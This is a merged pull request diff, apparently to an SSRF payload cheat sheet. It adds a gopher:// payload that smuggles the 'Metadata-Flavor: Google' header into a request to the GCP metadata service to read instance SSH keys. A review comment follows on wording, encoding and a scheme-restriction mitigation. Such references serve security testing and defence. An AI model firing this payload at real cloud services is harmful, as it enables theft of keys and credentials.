Merge pull request #142 from mikesiegel/mike_ssrf

Added anti-SSRF header bypass for GCP
Swissky 2020-01-01 12:44:41 +01:00 committed by GitHub
commit 0850839b25
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -501,6 +501,12 @@ http://metadata.google.internal/computeMetadata/v1beta1/
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
``` ```
Required headers can be set using a gopher SSRF with the following technique
```powershell
gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a
```
Interesting files to pull out: Interesting files to pull out:
- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json` - SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`
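Review bot: The added sentence "Required headers can be set using a gopher SSRF with the following technique" never names the header or says why it is required. The payload sets `Metadata-Flavor: Google` and requests `/computeMetadata/v1/`, while the surrounding context lines use `v1beta1`, so say that explicitly and end the sentence with a colon, as "Interesting files to pull out:" does. The new fence is tagged `powershell` although it holds a URL, so a plain fence would be more accurate. The percent-encoding is also inconsistent: the line terminators appear as `%0A`, `%0a` and `%0d%0a`, and `HTTP/1.1` is written as `HTTP%2f%31%2e%31` without explanation, so make the encoding uniform or add a line explaining it. Finally, state that the entry applies only when the fetching component accepts `gopher://` URLs, so readers can see that limiting outbound fetches to `http` and `https` closes this path.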